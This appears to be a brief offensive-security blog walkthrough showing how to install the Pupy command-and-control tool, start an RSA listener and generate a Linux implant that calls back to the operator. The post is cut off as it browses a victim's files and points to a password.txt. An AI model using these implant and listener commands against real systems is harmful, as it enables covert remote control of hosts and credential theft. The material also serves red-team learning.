[Offensive Security] Command and Control with Pupy!!

Takahiro Oda
Jan 16, 2022

What is Pupy?

Pupy is an open-source remote administration and post-exploitation tool written in Python. Pupy executes in memory, which leaves a low footprint on the host. Pupy also offers multiple communication channel options for its traffic.


  • initial access
  • execution
  • persistence
  • privilege escalation
  • defense evasion
  • credential access
  • discovery
  • lateral movement
  • collection
  • command & control
  • exfiltration
  • impact



To install Pupy, execute the following commands one by one:

git clone https://github.com/n1nj4sec/pupy

Now install all the requirements with pip using the following command:

cd pupy
pip install -r requirements.txt

Now run Pupy using the following command:


Establish a new session

Pupy Server: Main Terminal

config list

  • This command shows all configurations, including the [listeners].

listen -a rsa

gen --output output/linux.ln --output-dir /project --debug -f client -O linux -A x64 connect --host -t rsa

Victim — Linux

After 60 seconds, the implant should connect to the Pupy server.

Pupy Server: Main Terminal

  • ls
  • Notice the password.txt within the…